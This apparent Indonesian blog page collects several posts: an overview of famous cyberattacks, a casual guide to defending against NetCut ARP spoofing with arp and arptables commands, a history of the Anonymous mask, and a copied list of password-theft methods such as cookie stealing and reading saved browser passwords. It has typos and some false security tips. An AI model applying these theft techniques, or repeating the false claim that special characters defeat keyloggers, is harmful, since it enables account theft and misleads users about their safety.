"Indikasinya, pembuat Stuxnet ingin masuk ke dalam sistem dan tidak ditemukan untuk waktu lama dan melakukan perubahan secara perlahan dan diam-diam, tanpa menimbulkan kegagalan sistem," tulis Liam O Murchu, peneliti Symantec Security Response ketika itu. 

Awalnya, Stuxnet dikira sebagai worm biasa yang cukup canggih. Tapi, peneliti kemudian menemukan worm itu menargetkan sistem khusus 'supervisory control and data acquisition' (SCADA). 

SCADA digunakan untuk mengendalikan sistem pipa, pembangkit listrik tenaga nuklir dan perangkat manufaktur lainnya. Karena kecanggihannya, Stuxnet kemungkinan besar adalah buatan sebuah negara.

Lebih lanjut, peneliti menemukan bahwa Stuxnet dirancang untuk melakukan pencegatan perintah spesifik dari SCADA ke fungsi tertentu. Meski belum bisa dipastikan apa, namun temuan terbaru menguatkan dugaan bahwa targetnya adalah PLTN Bushehr atau Natanz di Iran. 

Presiden Iran, Mahmoud Ahmadinejad, mengkonfirmasi dampak serangan virus Stuxnet pada fasilitas nuklir Iran. Beberapa kerusakan diakuinya telah terjadi. 

"Spesialis kami telah menghentikan (virus itu) dan mereka tak akan bisa melakukan (kerusakan) lagi," lanjut Ahmadinejad. Pemerintah Iran meyakini, dalang serangan ini adalah Amerika Serikat atau Israel. 

Beberapa saat kemudian, Iran kembali diserang oleh Duqu, virus yang dinilai sebagai kembaran Duqu. Kesamaan sifat Duqu dan Stuxnet memunculkan spekulasi bahwa malware ini dibuat oleh orang yang sama atau penjahat cyber di balik Stuxnet memberikan kode ke pengembang Duqu. 

4. Flame 


Pada tahun 2012, lagi-lagi Iran terkena serangan cyber nan canggih. Kali ini, virus tersebut dinamakan sebagai Flame yang diduga turunan dari Stuxnet.

Pejabat senior Iran mengklaim jaringan komputer yang menangani sektor minyak Iran diserang salah satu virus komputer paling perkasa saat ini, Flame. 

Virus ini punya kemampuan yang belum pernah ada sebelumnya, yakni 'menyambar' setiap data yang ada dan 'menguping' di komputer si pengguna. 

"Para ahli di Iran saat ini telah memproduksi semacam anti virus yang bisa mengidentifikasi dan membersihkan Flame dari komputer," kata Ali Hakim Javadi, Deputi Kementerian Komunikasi dan Informasi Teknologi Iran. 

Banyak penelitian keamananan menyebutkan Flame sejatinya memang disponsori suatu negara. Analis di Symantec menemukan virus kompleks tersebut menggunakan mesin 'honeypot' dan memperhitungkan 'suicide code' yang mereka kirimkan akan menghapus semua jejak keberadaan Flame pada komputer yang terinfeksi. 

5. Serangan ke NASA 


Gary McKinnon adalah seorang hacker asal Inggris yang melancarkan serangan yang disebut sebagai hack komputer militer terbesar sepanjang masa. Sampai-sampai dia ditangkap dan terancam hukuman berat oleh pemerintah AS.

McKinnon menyerbu 97 komputer milik NASA dan militer AS. Ia melakukannya selama 13 bulan antara Februari 2001 sampai Maret 20012 di rumah pacarnya di London. 

Otoritas AS mengklaim dia menghapus file sangat penting dan mematikan 2000 komputer milik militer selama 24 jam. McKinnon juga menyatakan bahwa keamanan komputer di AS seperti sampah. 

McKinnon juga mengkopi berbagai data penting dan password ke komputer pribadinya. Sampai sekarang, kasus McKinnon belum selesai. Pemerintah Inggris dan AS masih tarik ulur soal apakah ia akan diadili di Inggris atau diekstradisi ke AS. 

6. Serbuan Anonymous 


Anonymous adalah kelompok hacker yang bergerak di bidang hacktivism. Mereka biasanya melancarkan serangan untuk memprotes kebijakan pemerintah tertentu, misalnya penyensoran internet.

Salah satu serangan menggegerkan yang dilakukan Anonymous terjadi pada awal tahun 2012. Memprotes kebijakan Stop Online Piracy Act (SOPA), Anonymous melancarkan serangan besar besaran pada berbagai website penting. 

Seperti Departemen Kehakiman AS, FBI, Universal Music Group, Recording Industry Association of America (RIAA), Motion Picture Association of America (MPAA), dan Broadcast Music, Inc. 

Situs situs tersebut sempat rubuh beberapa saat. Majalah Time sempat memasukkan Anonymous sebagai salah satu kelompok paling berpengaruh di 2012. 

7. Kevin Mitnick 


Di kalangan hacker dunia, sosok Kevin Mitnick adalah legenda. Dalam usia 16 tahun, Kevin sudah membobol sistem komputer Digital Equipment Corporation dan Pacific Bell. Kemudian aksinya semakin menjadi-jadi.

Pada awal 1990-an, Mitnick diketahui membobol jaringan perusahaan besar termasuk Motorola, NEC Corporation, Sun Microsystems dan Fujitsu Siemens. 

Ia juga pernah 'menginvasi' komputer FBI. Mitnick pun pernah dinobatkan sebagai penjahat komputer most wanted sebelum akhirnya ditangkap aparat pada tahun 1995. 

Dia dijatuhi hukuman selama 46 bulan. Saat ini, pria kelahiran tahun 1963 itu sudah tobat dan antara lain menjalani profesi sebagai konsultan sekuriti.
Judul : Inilah 7 Serangan Cyber yang Menghebohkan Dunia Deskripsi : Peperangan masa kini tidak hanya berlangsung di dunia nyata. Di dunia maya pun kerap terjadi sera...

23 Jul 2013

cara menangkal serangan netcut

yang saya bahas adalah, melindungi Komputer anda dari serangan NETCUT, untuk pengguna Windus dan LINUX…
semua pernah dengar NETCUT kan???
wokeh, saya jelaskan teknik yang sesuai dengan judul di atas (maaf masih cupu neh) jadi tulisannya gak keren,,, hehehheee,,,
apa anda pikir software anti netcut bisa melindungi anda??? i not think so,
Anti Netcut kadang tidak bisa bekerja sesuai dengan fungsinya, dan cara manual lebih mantap…
wokeh, teknik pertama, Versi Korban Menggunakan Windus…
cara menahannya, cuma buka Command Prompt
Start > Run > Ketik CMD > dan Enter
maka layar itam tulisan putih muncul, dan silahkan pelototi hingga 3 jam, di jamin mata berair dan pedis.. hahahaa (becanda)
sampai mana tadi ?
oh iya, cmd udah kebuka,
silahkan ketikkan arp -a trus enter
nah, kita liat kalau ada yang melakukan transfer ARP pada PC kamu,,, eeiittt…. hati2, kalau kamu menggunakan Wifi, liat dulu, mana IP Modem dan mana IP Wifi yang kamu Koneksikan, yah,, anggaplah IP Attacker itu menggunakan 192.168.1.46 dengan MAC 00-98-XX-XX-XX-XX
ketikkan di command prompt arp -d 192.168.1.46 trus enter lagi…
coba ketik arp -a apa masih ada tuh IP ???
kalau sudah tidak ada, berarti transfer ARP dari attacker ke Kompi kamu itu sudah terputus, dan dia pasti tidak tau,,, heheheee….
Cara ke Dua – kalau cara itu masih tidak mempan, silaahkan ganti IP Dynamis menjadi IP Statis
Cara Ke Tiga – kalau kedua trick di atas gak bisa, apa boleh buat, tipu NETCUT dengan membuat PORT palsu, bisa menggunakan Tool PORT Monster…
Linux Version =
Teknik pertama yang di gunakan hampir sama, Jika anda pengguna linux, bisa menggunakan Terminal
Aplication > Terminal
ketik arp -a
dan lakukan seperti perintah Windows di atas.
jika cara ini masih tidak bisa, silahkan gunakan trick ini =
Caranya adalah anda harus Install arptables
Dengan cara, buka Terminal ketikkan :
$sudo apt-get install arptables
Maka dengan menginstall arptables telah menambahkan baris berikut ke script firewall
Jika “192.168.1.1″ adalah IP gateway dan “0:01 D: 0F: A9: F0: 45″ adalah alamat mac gateway
Maka yang selanjutnya yang di lakukan adalah ketikkan di bawah ini :
#arptables -P INPUT DROP
#arptables -P OUTPUT DROP
#arptables -A INPUT -s 192.168.1.1 –source-mac 00:1D:0F:A9:F0:45 -j ACCEPT
#arptables -A OUTPUT -d 192.168.1.1 –destination-mac 00:1D:0F:A9:F0:45 -j ACCEPT
#arp -s 192.168.1.1 00:1D:0F:A9:F0:45
(mudah-mudahan berhasil) heheheeee…
kalau masih tidak bisa, ada trick lagi neh
tinggal Disable ARP Client
cara mematikan (disable) ARP Client pada Linux box anda selama melakukan koneksi. Caranya adalah dengan mengetikan perintah dibawah ini pada terminal:
$ sudo ifconfig wlan0 –arp
Note: lakukan perintah ini pada saat anda telah terkoneksi pada jaringan anda, jika tidak, maka anda tidak dapat Connect.
jika telah selesai bersurfing, silahkan ENABLE ARP Client anda dengan perintah =
$ sudo ifconfig wlan0 arp
(Disable dan Enable cuma beda dikit perintahnya beda ginian “-”) hehehheee….
ehh… Kalau masih tidak bisa???
berarti anda yang salah…. PISS
cara ke-2
Jangan Pernah menggunakan Netcut. Sekali orang dirugikan akibat perbuatan anda, maka akan ada dendam.
>> Rubah IP address anda apabila merasa dijahili dengan Netcut, karena pengguna netcut tidak akan bisa memutuskan koneksi komputer kita tanpa mengetahui IP kita.
>> Gunakan Anti Netcut (tetapi netcut selalu lebih maju dari anti netcut), Download Disini : http://download.cnet.com/3001-2085_4-10584471.html?spi=cd0f0e0659bc16432ce776934e9d8db4
>> Hidden komputer dari LAN pake XP antispy. XP antispy adalah utiliti kecil untuk menyingkirkan atau menonaktifkan program-program yang tidak diperlukan. Bisa jadi, XP antispy terbaru bisa menonaktifkan Netcut. Atau mungkin, kita bisa meng-hidden komputer kita agar pengguna netcut tidak bisa mendeteksi komputer kita.
>> Install anti ARP (trial). Mungkin saja Anti ARP ini bukan freeware, jadi mungkin lebih baik pakai trialnya saja yang gratis. AntiARP fitures: intercept ARP spoofing / ARP serangan / peracunan ARP, intercept Alamat IP konflik, Mencegah serangan Dos, Keselamatan modus, ARP arus analisis, Lindungi ARP cache, pertahanan aktif, Cari penyerang,membersihkan virus ARP.
>> Rubah MAC Address. MAC Address (Media Access Control Address) adalah sebuah alamat jaringan yang diimplementasikan pada lapisan data-link dalam tujuh lapisan model OSI, yang merepresentasikan sebuah node tertentu dalam jaringan. Dalam sebuah jaringan berbasis Ethernet, MAC address merupakan alamat yang unik yang memiliki panjang 48-bit (6 byte) yang mengidentifikasikan sebuah komputer, interface dalam sebuah router, atau node lainnya dalam jaringan. MAC Address juga sering disebut sebagai Ethernet address, physical address, atau hardware address. Salah satu software yang bisa digunakan untuk mengubah MAC address adalah K-Mac. K-Mac biasanya di gunakan dalam proses membobol jaringan Lan atau Wifi yang menerapkan filltering Mac, jadi K-Mac di pergunakan pada tahap akhir proses hack WiFi yang ter enskripsi atau terkunci. Bila kita terkena serangan NetCut, dapat di akali dengan K-Mac, kemudian aktifkan NetCut untuk proteksi.
Selamat mencoba kawan , , moga ber mamfaat heheheee , ,
cara ampuh menangkal serangan netcut, cara manual menahan seranagn netcut, cara menyerang balek pengguna netcut, cara melindungi diri dari serangan netcut, menghantam balik penguna netcut, memasukkan penggunanet cut kedalam neraka, tifs dan trik menangkal keganasan netcut, cara membasmi pengguna netcut, menepis serangan netcut dengan mudah, cara menghabisi penguna netcut, melumpuhkan pengguna netcut.

22 Jul 2013

Asal Mula Sejarah Topeng Anonymous.

Asal Mula Sejarah Topeng Anonymous. Artikel ini saya dapatkan dari teman blogger kita, yaitu http://fhirman-ilham.blogspot.com/. Jadi, saya ucapkan terima kasih atas artikelnya. Mohon maaf saya tidak ijin dulu. Semoga agan membaca ini. Baik, untuk anda yang belum mengetahui kenapa kelompok Hacktvisme "Anonymous" mengenakan topeng "Guy Fawkes"?. Sebenarnya tidak ada kaitan sama sekali antara Guys Fawkes dan Anonymous. Sebelumnya kita membahas lebih jauh latar belakang Anonymous, kita akan membahas terlebih dahulu latar belakang Guys Fawkes.
Sejarah Topeng Anonymous, PutuGiBagi
Guy Fawkes
Adalah karakter yang facenya dijadikan topeng identik kelompok hacker cyber cream terbesar di dunia "Anonymous". Guy Fawkes adalah pelaku peledakan bom di Gedung Parlemen Inggris. Dia bersama anggotanya melakukan aksi tersebut karena ingin membunuh Raja James 1. Namun aksi Guy Fawkes dan teman-temannya berhasil di gagalkan oleh pihak keamanan kerajaan. Peristiwa pengeboman sekaligus penangkapan Guy Fawkes dan anggotanya terjadi pada 5 November 1605. Namun anehnya, penangkapan hanya di tunjukan pada Guy Fawkes, 30 anggoatanya berhasil meloloskn diri, saya belum bisa memastikan kenapa hanya Guy Fawkes yang tertangkap. Peristiwa pengeboman besar itu di kenal dengan sebutan "Peristiwa Bubuk Mesiu" atau "Gun Powder Plot". Untuk mengenang peristiwa tersebut masyarakat inggris menggelar perayaan kembang apa setiap tanggal 5 November. Saya rasa sampai disini sobat sudah mengenal siapa itu Guy Fawkes. Lantas apa hubungannya dengan Anonymous?.
Sejarah Topeng Anonymous, PutuGiBagi
Anonymous
Bagi sobat yang sering berkutat di dunia maya, atau yang sering blogger dan coba-coba menghack sesuatu, tentu sudah tidak asing lagi dengan istilah ‘’Anonymous’’. Di Indonesia sendiri istilah Anonymous mulai tenar pada tahun 2010, dimana pada saat itu Sekelompok hactvisme yang mengaku dirinya Anonymous berhasil melakukan penyerangan terhadap Playstation Network, belum jelas aksi apa yang dilakukannya. Banyak orang yang menyebutkan bahwa Anonymous adalah Hacktvisme yang beranggotakan Hacker-hacker dan Craker-craker yang sangat ahli dalam urusan Hack. Anggapan itu ternyata salah besar !!! Kenapa ??? Setelah saya telusuri di mbah google, ternyata Anonymous hanyalah sekumpulan orang yang suka nimbrung di  4CHAN. 4CHAN adalah salah satu situs tempat forum diskusi, tanya jawab, berbagi, dll deh,,kalo di Indonesia mungkin lebih sering di kenal dengan KASKUS...hehehe. Nah di 4CHAN itu para anggota tidak harus mendaftarkan diri untuk menulis atau mengomentari suatu Post, jadi di bebaskan kepada setiap orang tanpa terkecuali untuk saling berbgai di 4CHAN. Nah para anggota yang tidak mendaftar tersebut teridentitas sebagai ‘’Anonymous’’ atau kalo di terjemahkan dalam bahasa Indonesia berarti Tanpa Nama atau Tanpa Identitas.
Di Kaskuskan ada tuh pembagian forum-forum sesuai dengan pokok pembahasan, ada forum Blog, Anime, Gamer, dll. Begitu juga 4chan, di 4Chan terdapat beberapa forum & salah satu forum yang paling banyak peminatnya adalah forum ‘’RANDOM’’. Forum Random memungkinkan para anggotanya untuk menulis artikel sebabas mungkin, mau masalah Politik, Hukum, Sosial, Pemerintahan, Program, Pornografi, Pokoknya bebas deh mau apa,, mau Nungging juga boleh,,hehehe. Nah akibat dari kebebasan yang tak terbatas, maka 4Chan juga dijadikan forum untuk membahas tentang Batasan-batasan yang dilakukan pemerintah terhadap Teknologi dan Internet, mereka membahas tentang gerakan perlawanan terhadap kebijakan yang membatasi Dunia Maya. Para Anonymous berpendirian bahwa ‘’Tidak ada batasan dalam berinternet, dan Internet merupakan suatu yang Harus Gratis !!’’.
Nah dari situlah para Anonymous mulai menyerang situs-situs yang di anggap terlalu Mengekang dan melawan keinginan mereka. Anonymous tidak asal hack !!! mereka memikirkan dan membahas secara matang-matang target yang akan dijadikan sasaran Hack. Memang tak dapat di pungkiri bahwa dari banyak Anggota Anonymous ada sebagian yang Jago soal Hack dan Crak. Nah sekarang sobat sudah tau kan siapa Anonymous. Anonymous tidak jauh beda dengan Kaskuser. Sekarang kita akan membahas tentang kaitan Topeng Guy Fawkes dengan Anonymouse.

VFor Vendetta
Sudah saya jelaskan di atas bahwa Tidak ada sama sekali Hubungan antara Guy Fawkes dengan Anonymous. Guy Fawkes bukan anggota dari Anonymous !!! Menurut  hasil pencarian mbah Google, alasan yang paling mendukung mengapa Anonymous menggunakan topeng Guy Fawkes adalah, Terinspirasi dari film yang berjudul ‘’V for Vendetta’’. Film ‘’V for Vendetta’’ menceritakan tentang seorang yang yang melakukan perlawanan terhadap pemerintah Inggirs yang telah membuat masyarakat tidak berdaya. Dalam film ini, tokoh V mengenakan Topeng yang di ambil dari facenya Guy Fawkes, mungkin karena Guy Fawkes yang juga merupakan tokoh yang melakukan perlawanan terhadap pemerintah inggirs, sehingga tokoh V disamakan dengan Guy Fawkes. Nah.. karena Missi dan tujuan Tokoh V dan Guy Fawkes yang sama dengan tujuan Anonymous, yaitu sama-sama menentang sistem pemerintahan yang mengekang kebebasan, maka Anonymous menggunakan Topeng Guy Fawkes sebagai ciri khas mereka. Itulah alasan mengapa Anonymous memakai topeng Guy Fawkes.

Berbagai macam cara membajak Password

Ada banyak cara untuk mendapatkan suatu password / membajak password / crack password. Beberapa diantaranya tidak membutuhkan keahlian khusus. Berikut adalah cara-cara yang paling umum dan paling sering digunakan :
[1]. Social Engineering
[2]. KeyLogger
[3]. Web Spoofing
[4]. Menghadang Email
[5]. Password Cracking
[6]. Session Hijacking
[7]. Menjadi Proxy Server
[8]. Memanfaatkan Kelalaian User Dalam Penggunaan FiturBrowser
[9]. Googling
[10]. Phising

[1]. Social Engineering

Social Engineering adalah nama suatu tehnik pengumpulan informasi dengan memanfaatkan celah psikologi korban. Atau mungkin boleh juga dikatakan sebagai ‘penipuan’ Sosial Engineering membutuhkan kesabaran dan kehati-hatian agar sang korban tidak curiga. Kita dituntut untuk kreatif dan mampu berpikiran seperti sang korban.
Social Engineering merupakan seni ‘memaksa’ orang lain untuk melakukan sesuatu sesuai dengan harapan atau keinginan anda. Tentu saja ‘pemaksaan’ yang dilakukan tidak secara terang-terangan atau diluar tingkah laku normal yang biasa dilakukan sang korban. Manusia cenderung untuk percaya atau mudah terpengaruh terhadap orang yang memiliki nama besar, pernah (atau sedang berusaha) memberikan pertolongan, dan memiliki kata-kata atau penampilan yang meyakinkan. Hal ini sering dimanfaatkan pelaku social engineering untuk menjerat korbannya. Seringkali sang pelaku membuat suatu kondisi agar kita memiliki semacam ketergantungan kepadanya.Ya, tanpa kita sadari dia mengkondisikan kita dalam suatu masalah dan membuat ( seolah – olah hanya ) dialah yang bisa mengatasi masalah itu. Dengan demikian,tentu kita akan cenderung untuk menuruti apa yang dia instruksikan tanpa merasa curiga.
Sosial Engineering adakalanya menjadi ancaman serius. Memang sepertinya tidak ada kaitan dengan teknologi, namun sosial engineering tetap layak diwaspadai karena bisa berakibat fatal bagi sistem anda. Why?? Karena bagaimanapun juga suatu komputer tetap saja tidak bisa lepas dari manusia. Ya, tidak ada satu sistem komputerpun di muka bumi ini yang bisa lepas dari campur tangan manusia. sehebat apapun pertahanan anda, jika anda sudah dikuasai oleh attacker melalui social engineering, maka bisa jadi anda sendirilah yang membukakan jalan masuk bagi sang attacker.
[2]. KeyLogger

KeyLogger adalah software yang dapat merekam aktivitas user. Hasil rekaman itu biasa disimpan berupa teks atau gambar. KeyLogger bekerja berdasarkan ketukan keyboard user. Aplikasi ini mampu mengenali form-form sensitif seperti form password misalnya.
Ada cara aman untuk menghindari keyloger:
1. Gunakan password dengan karakter special seperti !@#$%^&*(){}[]. Kebanyakan keyloger akan mengabaikan karakter ini sehingga sang pelaku (pemasang keyloger) tidak akan mendapatkan password anda yang sebenarnya.
2. Persiapkan password dari rumah, simpan dalam bentuk teks. Saat ingin memasukkan password, tingal copy-paste ajah. Keyloger akan membaca password anda berdasarkan ketukan keyboard. Namun cara ini agak beresiko. Mengapa? karena saat anda melakukan copy, data anda akan tersimpan di clipboard. Saat ini banyak dijumpai software-software gratis yang bisa menampilkan data dalam clipboard.
[3]. Web Spoofing

Masih ingat kasus pecurian Account sejumlah nasabah Bank BCA? Ya, itulah salah satu contoh nyata dari Web spoofing. Inti dari tehnik ini ialah dengan memanfaatkan kesalahan user saat mengetikkan alamat situs pada address bar. Pada dasarnya, Web Spoofing adalah usaha untuk menipu korban agar mengira dia sedang mengakses suatu situs tertentu, padahal bukan.
Pada kasus bank BCA, pelaku membuat situs yang sangat mirip dan identik dengan situs aslinya sehingga sang korban yang terkecoh tidak akan merasa ragu mengisikan informasi sensitif seperti user name dan Passwordnya. Padahal, karena situs tersebut adalah situs tipuan, maka semua informasi berharga tadi terekam oleh webserver palsu, yaitu milik sang pelaku.
[4]. Menghadang Email

Menghadang email? Ya, dan sangat mudah untuk melakukan hal ini. Salah satu cara adalah dengan menggunakan mailsnarf yang terdapat pada utility dsniff. Cara kerja Mailsnarf adalah dengan menghadang paket data yang lewat di Internet dan menyusunnya menjadi suatu email utuh.
Dsniff dan mailsnift merupakan software bekerja atas dasar WinPcap (setara dengan libcap pada Linux) yaitu suatu library yang menangkap paket-paket data. Paket-paket yang ditangkap ini akan disimpan dalam bentuk file oleh Windump, sedangkan Dsniff dan MailSnarf bertindak lebih jauh lagi yaitu menganalisa paket-paket data ini dan menampilkan password (dsniff) atau isi email (mailsnarf).
[5]. Password Cracking

‘Hacking while sleeping.’ itulah ungkapan yang biasa dipakai oleh orang-orang yang melakukan password cracking. Mengapa? Karena pada umumnya dibuthkan waktu yang lama untuk melakukan pasword cracking. Bisa berjam-jam, bahkan berhari – hari! Semua itu tergantung dari target, apakah sang target menggunakan password yang umum, password memiliki panjang karakter yang tidak biasa, atau password memiliki kombinasi dengan karakter-karakter special.
Salah satu software yang biasa digunakan untuk melakukan hal ini ialah dengan mengunakan Brutus, salah satu jenis software remote password cracker yang cukup terkenal. Brutus bekerja dengan teknik dictionary attack atau bruce-force attack terhadap port-port http, POP3,ftp, telnet, dan NetBIOS.
Dictionary Attack bekerja dengan mencobakan kata-kata yang ada dalam kamus password. Sedangkan brute – force attack bekerja dengan mencobakan semua kombinasi huruf, angka, atau karakter.
Brute Force Atack bekerja sangat lambat dan membutuhkan waktu yang lama tergantung dari jenis spesifikasi komputernya dan panjang karakter passwordnya. Saat ini telah banyak situs yang menutup akses terhadap akses terhadap usaha login yang secara terus-menerus tidak berhasil.
[6]. Session Hjacking

Session hijacking dewasa ini semakin marak dikalangan para attacker. Session Hijacking biasa dilakukan dengan melakukan peniruan cookies. Jadi pada intinya, kita harus bisa meniru cookies sang korban untuk mendapatkan sesi loginnya.
Lalu bagaimana cara mendapatkan cookies sang korban?
1. Dengan analisa Cookies.
Cara ini relatif sulit dilakukan.
2. Mencuri Cokies.
Misalnya Sang Attacker ingin mendapatkan account si A. Sang Attacker bisa dengan mudah membuat semacam script Java Script yang disisipkan dalam email untuk dikirim ke korban.Saat korban membuka email itu, tanpa sadar cookiesnya akan dicuri dan direkam ke suatu webserver dengan memanfaatkan suatu script PHP.
Belakangan ini yang paling sering menjadi incaran adalah account Friendster. Ada yang menyisipkan suatu scipt lewat testimonial, ada yang menyisipkannya di profilnya sendiri untuk mencuri cookies sang korban dan lain sebagainya. Saya memiliki tips untuk ini:
1. Jangan menggunakan browser Internet Explorer
Saat ingin membuka profil orang lain, jangan menggunakan Internet Explorer. Catat alamat profil yang ingi anda lihat,logout terlebih dahulu dari account anda dan bersihkan semua cookies, baru kemudian bukalah profil Friendster tujuan.
2. Periksa Source CODEnya
Ketika menerima testimonial, periksa terlebih dahulu source codenya. Apakah disana terdapat script asing atau kata-kata yang identik dengan pembajakan seperti :
‘HACKED’, ‘DEFACED’, ‘OWNED’.. dll..
Jika ragu-ragu……. reject ajah..
3. LogOUT tiba-tiba.
Waspada ketika tanpa suatu alasan yang jelas tiba-tiba anda logout dengan sendirinya dari account anda. Saat anda diminta memasukkan username dan password, lihat dulu addressbar anda! apakan anda sedang berada di situs yang semestinya atau tidak. Periksa source code halaman tersebut.Lihat pada form action, kemana informasi anda nantinya akan dikirim.
Sebenarnya session hijacking bisa dicegah jika saja sang penyedia layanan memperhatikan hal-hal berikut:
1. Menetapkan session identifier yang unik
2. Menetapkan sistem identifier berpola acak
3. Session identifier yang independen
4. Session identifier yang bisa dipetakan dengan koneksi
client side.
Fenomena lain adalah, hingga saat artikel ini diterbitkan, ternyata masih banyak dijumpai para user yang tidak melakukan sign out setelah membuka accountnya. Dengan demikian, orang lain yang mengunakan komputer itu dan membuka website yang sama dengan yang telah dibuka oleh orang pertama akan otomatis login ke account sang korban.
[7]. Menjadi Proxy Server

Kita bisa mengumpulkan informasi dengan menjadi proxy server bagi korban untuk dapat berselancar. Dengan menjadi proxy server, seluruh identitas sang peselancar bisa menjadi milik kita.
[8]. Memanfaatkan Kelalaian user dalam penggunaan fiturbrowser

Setiap browser tentunya memiliki fitur yang ditujukan untuk kemudahan dan kenyamanan penggunanya dalam berselancar. Diantaranya ialah dengan adanya cache dan Password Manager.
Di Internet tentunya banyak suatu website yang isinya tidak berubah dalam beberapa hari (Contohnya spyrozone.tk nich.. hehehe Nah, untuk situs yang seperti ini cache menjadi hal yang sangat berguna. Cache akan menyimpan file-file hasil browsing sehinga nantinya jika anda berkunjung lagi ke situs tersebut browser tidak perlu lagi melakukan download untuk kedua kalinya dari server sehingga setiap halaman situs yang telah anda buka sebelumnya akan terbuka dengan lebih cepat. Semua itu biasanya diatur oleh header time to live.
Lho, bagaimana dengan situs-situs penyedia berita yang selalu up to date? Untuk site yang seperti itu, time to live-nya akan di set=0 sehinga nantinya anda akan terus melakukan download setiap kali berkunjung.
Cukup nyaman bukan? Ya, tapi ancaman mulai timbul. Cobalah kini anda jelajahi opsi-opsi yang berkaitan dengan cache pada browser anda. Tentu anda bisa menemui bahwa ada fasilitas untuk menentukan berapa besarnya file temporary yang bisa disimpan di harddisk. Cari juga lokasi dimana file-file tersebut akan disimpan.
Coba anda buka folder tersebut, anda akan menemui file-file html & file-file gambar dari site-site yang sudah anda kunjungi. Pada Browser IE, anda bisa melihat lokasi file cache dengan menjelajahi menu Tools — Internet options — Settings
Lalu apa yang bisa didapatkan?? toh cuma file-file ‘sampah’?? Hmm… sekarang coba anda copy semua file yang ada di sana ke suatu folder. Lalu bukalah salah-satu file htmlnya. Jika itu komputer publik,anda bisa mengetahui situs apa saja yang telah diakses oleh oleh orang sebelum anda.
Hmm.. hanya dengan melihat file temporary anda bahkan bisa melihat password dan dll. Banyak saya temui situs yang menyimpan password dan menampilkannya pada url. Tentunya anda juga pasti sering membacanya di berbagai tutorial.
Kebanyakan browser pada saat ini memiliki fasilitas untuk menyimpan password. Misalnya saat meggunakan Mozilla Firefox, anda pasti sering menerima kotak dialog konfirmasi yang menanyakan apakah anda ingin password anda disimpan atau tidak oleh PasswordManager. Kebanyakan user cenderung untuk memilih opsi YES, entah itu dengan penuh kesadaran atau memang mereka tidak tau ( baca: tidak mau tau) apa maksud dari kotak dialog itu.
Orang lain yang kemudian mengunakan browser itu bisa dengan sangat mudah mendapatkan password korban dengan memasuki menu Tools — Options — Security – Saved password.
Contoh lain adalah fasilitas wand password yang dimiliki oleh browser Opera. Saat anda memasukkan user name dan password pada suatu form dan menekan tombol submit, opera secara default akan meminta konfirmasi kepada anda apakah anda ingin browser menyimpan id dan password anda atau tidak. Lagi dan lagi… kebanyakan netter ceroboh, mereka cenderung untuk memilih opsi ‘YES’.
Lalu?? Orang lain yang kemudian menggunakan browser itu bisa melihat situs apa saja yang telah diakses oleh user, arahkan browser ke situs tersebut, letakkan cursor pada form isian user name, tekan [ALT]+[ENTER] dan BOOOMM!!!! Kenapa?? Jangan kaget dulu!! Hehehe.. form login akan otomatis terisi dengan user name korban lengkap dengan passwordnya (It’s fun enough..
Ini hanya sebagian kecil contoh, jelajahi fitur-firtur browser lain!
[9]. Googling

Google.com. Banyak sudah situs yang runtuh, password dan nomor – nomor kartu kredit yang dicuri akibat dari ulah orang yang menyalahgunaan kesaktiannya Dahulu, hal ini mudah dilakukan.Hanya dengan mengetikkan kata kunci tertentu yang berkaitan dengan user name dan password, anda bisa memanen ratusan password user melalui google. Tapi sekarang tampaknya anda harus gigit jari jika menggunakan cara diatas
Jangan sedih dulu karena Google baru saja menelurkan produk barunya, yaitu Google Code Search. Ancaman baru mulai timbul, ‘si pintar’ ini kini dapat meng-crawl hingga kepada archive file yang berada di public directory web server. Hati-hati yang punya kebiasaan untuk menyimpan informasi penting di dalamnya (password, dan info berharga lainnya) Sebaiknya mulai sekarang kebiasaan itu dihilangkan. Selalu proteksi folder-folder yang sensitif agar situs anda bisa hidup lebih lama. Kalo nggak… yach.. tunggu ajah ada orang yang memanfaatkan produk baru google ini untuk mengeruk informasi sensitif dari web server anda. dan jika itu sudah terjadi… maka bersiaplah.. ‘taman bermain’ anda akan diambil alih olehnya..
[10] Phising

Phising , adalah tindakan memperoleh informasi pribadi seperti User ID, PIN, nomor rekening, nomor kartu kredit Anda secara tidak sah. Informasi ini kemudian akan dimanfaatkan oleh pihak penipu untuk mengakses rekening, melakukan penipuan kartu kredit atau memandu nasabah untuk melakukan transfer ke rekening tertentu dengan iming-iming hadiah
Aksi ini semakin marak terjadi. Tercatat secara global, jumlah penipuan bermodus phising selama Januari 2005 melonjak 42% dari bulan sebelumnya. Anti-Phishing Working Group (APWG) dalam laporan bulanannya, mencatat ada 12.845 e-mail baru dan unik serta 2.560 situs palsu yang digunakan sebagai sarana phishing.
Selain terjadi peningkatan kuantitas, kualitas serangan pun juga mengalami kenaikan. Artinya, situs-situs palsu itu ditempatkan pada server yang tidak menggunakan protokol standar sehingga terhindar dari pendeteksian
Bagaimana phishing dilakukan?
Teknik umum yang sering digunakan oleh penipu adalah sebagai berikut:
  • Penggunaan alamat e-mail palsu dan grafik untuk menyesatkan Nasabah sehingga Nasabah terpancing menerima keabsahan e-mail atau web sites. Agar tampak meyakinkan, pelaku juga seringkali memanfaatkan logo atau merk dagang milik lembaga resmi, seperti; bank atau penerbit kartu kredit. Pemalsuan ini dilakukan untuk memancing korban menyerahkan data pribadi, seperti; password, PIN dan nomor kartu kredit
  • Membuat situs palsu yang sama persis dengan situs resmi.atau . pelaku phishing mengirimkan e-mail yang berisikan link ke situs palsu tersebut.
  • Membuat hyperlink ke web-site palsu atau menyediakan form isian yang ditempelkan pada e-mail yang dikirim.
source:
http://www.binushacker.net/bebagai-cara-membajak-password.html